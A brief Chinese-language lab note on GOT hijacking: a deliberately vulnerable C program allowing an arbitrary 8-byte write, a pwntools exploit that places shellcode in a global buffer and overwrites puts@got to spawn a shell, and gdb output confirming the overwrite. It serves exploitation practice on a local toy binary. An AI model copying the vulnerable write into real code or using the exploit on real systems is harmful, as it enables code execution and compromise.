栈溢出-GOT表劫持测试
1、目标程序源代码
char name[64];
int main()
{
int unsigned long long addr;
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
printf("What's you name?\n");
read(0,name,0x40);
printf("Where do you want to write?\n");
scanf("%llu",&addr);
printf("Data:");
read(0,(char *)addr,8);
puts("Done!");
printf("Thank you %s!\n",name);
return 0;
}
2、exp代码
from pwn import *
context(arch = 'amd64', os = 'linux')
r=process("./got")
raw_input()
print(r.recvline())
r.send(asm(shellcraft.sh()))
print(r.recvline())
r.sendline(str(0x404018))#send puts address
print(r.recvuntil("Data:"))
raw_input()
r.send(p64(0x404080)) #send name address
r.interactive()
3、调试
a、got表puts函数覆盖前地址
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x00007fa3f4daf5a0
b、got表puts函数覆盖后地址
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x0000000000404080